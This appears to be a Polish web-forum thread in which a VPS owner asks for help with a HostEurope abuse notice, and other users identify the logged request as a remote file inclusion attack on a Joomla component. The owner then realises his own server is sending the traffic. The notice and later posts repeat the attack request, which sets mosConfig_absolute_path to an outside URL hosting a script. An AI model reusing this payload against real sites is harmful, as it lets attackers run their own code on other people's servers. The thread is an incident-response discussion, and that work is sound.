Witam serdecznie,
Dostalem monit od HostEurope o ataku na serwis, nie bardzo rozumiem monit ktory mi przesłali:
> Mon Oct 27 09:45:01 CET 2008
>
> I am sorry to have to inform you that access to our server for the host
with the IP-Address 87.230.33.107 has been denied.
>
> The host identified by IP-Address [zmoderowane] has tried to execute
following action[s]:
>
> -----------------------------------------------------
> 87.230.33.107 - - [27/Oct/2008:09:41:07 +0100] "GET
/index.php?option=com_xmap&Itemid=&mosConfig_absolute_path=http://[zmoderowane].com/spam/bo.do?
HTTP/1.1" 404 18787 "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1)
Gecko/20060918 Firefox/2.0"
> Mon Oct 27 09:42:06 CET 2008 [B++] Blocking permanently [zmoderowane]
[zmoderowane]. Host seems to be a server. Response: Interesting ports on
[zmoderowane] ([zmoderowane]): 22/tcp open ssh 25/tcp
open smtp 80/tcp open http 110/tcp open pop3
> -----------------------------------------------------
>
> This action[s] has been recognized as an hack attempt and access to the
server for this IP-Address has been denied.
>
> See also: [zmoderowane]
>
>
> Best Regards,
> Abuse Reporting Script
>
> PS: IMPORTANT: This email has been generated automatically. Remember,
this is just a notification. Please do not reply to this email.
>
> --------------------------------
>
> NOTICE - This e-mail is only intended to be read by the named recipient.
> It may contain information which is confidential, proprietary or the
subject of legal privilege.
> If you are not the intended recipient please notify the sender
immediately and delete this e-mail.
> You may not use any information contained in it.
> Legal privilege is not waived because you have read this e-mail.
>
>
>
Jak to powianiem przeanalizować ? co sprawdzić ? i co im odpisać bo mnie straszą że wyłączą VPS! ?
Pełna wersja: Atak na serwis..
Nic nie powinieneś odpisywać bo to jest wiadomość wygenerowana automatycznie i jest nawet to napisane w ostatniej linijce :
> PS: IMPORTANT: This email has been generated automatically. Remember,
this is just a notification. Please do not reply to this email.
(cienko z angielskim ?)
Poinformowali Cię po prostu, że jakiś gość o IP 87.230.33.107 próbował Ci coś tam popsuć i że jego IP zostało zablokowane. Napisali abyś zapoznał się z tym czymś : [zmoderowane]
Pozdrawiam
CODE
> PS: IMPORTANT: This email has been generated automatically. Remember,
this is just a notification. Please do not reply to this email.
(cienko z angielskim ?)
Poinformowali Cię po prostu, że jakiś gość o IP 87.230.33.107 próbował Ci coś tam popsuć i że jego IP zostało zablokowane. Napisali abyś zapoznał się z tym czymś : [zmoderowane]
Pozdrawiam
Nieptrzebne dla nikogo adres IP, nazwy hostów oraz linki zmoderowałem.
/index.php?option=com_xmap&Itemid=&mosConfig_absolute_path=http://[zmoderowane].com/spam/bo.do?
wyglada na to, ze ktos probowal uzyc ataku RFI
wyglada na to, ze ktos probowal uzyc ataku RFI
MFIPETER - Dzieki za blyskotliwą odpowiedź 
Tyle ze ktos probowal namieszać to chyba jasne jak słońce
adres IP to adres mojego serwera i ktoś probował wykonać ten plik http://vobucks.com/spam/bo.do?
wciskając to GETem,
Nie rozumiem co mogą namieszać te zmienne - ?option=com_xmap&Itemid=&mosConfig_absolute_path=
czy nie są to jakieś zminne serwerowe ?
Jak dlamnie nic to nie psuuje - chociaz Oni sie klucą ze obciązam im siec!
Może być uruchomiony jakiś skrypt - jak mogę go wykryć ?
Tyle ze ktos probowal namieszać to chyba jasne jak słońce
adres IP to adres mojego serwera i ktoś probował wykonać ten plik http://vobucks.com/spam/bo.do?
wciskając to GETem,
Nie rozumiem co mogą namieszać te zmienne - ?option=com_xmap&Itemid=&mosConfig_absolute_path=
czy nie są to jakieś zminne serwerowe ?
Jak dlamnie nic to nie psuuje - chociaz Oni sie klucą ze obciązam im siec!
Może być uruchomiony jakiś skrypt - jak mogę go wykryć ?
Cytat(pieto @ 28.10.2008, 20:54:13 ) 
MFIPETER - Dzieki za blyskotliwą odpowiedź
Tyle ze ktos probowal namieszać to chyba jasne jak słońce
adres IP to adres mojego serwera i ktoś probował wykonać ten plik http://vobucks.com/spam/bo.do?
wciskając to GETem,
Nie rozumiem co mogą namieszać te zmienne - ?option=com_xmap&Itemid=&mosConfig_absolute_path=
czy nie są to jakieś zminne serwerowe ?
Jak dlamnie nic to nie psuuje - chociaz Oni sie klucą ze obciązam im siec!
Może być uruchomiony jakiś skrypt - jak mogę go wykryć ?
Tyle ze ktos probowal namieszać to chyba jasne jak słońce
adres IP to adres mojego serwera i ktoś probował wykonać ten plik http://vobucks.com/spam/bo.do?
wciskając to GETem,
Nie rozumiem co mogą namieszać te zmienne - ?option=com_xmap&Itemid=&mosConfig_absolute_path=
czy nie są to jakieś zminne serwerowe ?
Jak dlamnie nic to nie psuuje - chociaz Oni sie klucą ze obciązam im siec!
Może być uruchomiony jakiś skrypt - jak mogę go wykryć ?
spojrz na mojego ostatniego posta
EE, moze w drugą stronę,
dopiero teraz skumalem ze to ja wysylam
jakies smieci,
jak mozna najlatwiej dojsc gdzie to siedzi i zniszczyc ?
mam SUSE 10 z pleskiem
dopiero teraz skumalem ze to ja wysylam
jakies smieci,jak mozna najlatwiej dojsc gdzie to siedzi i zniszczyc ?
mam SUSE 10 z pleskiem
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.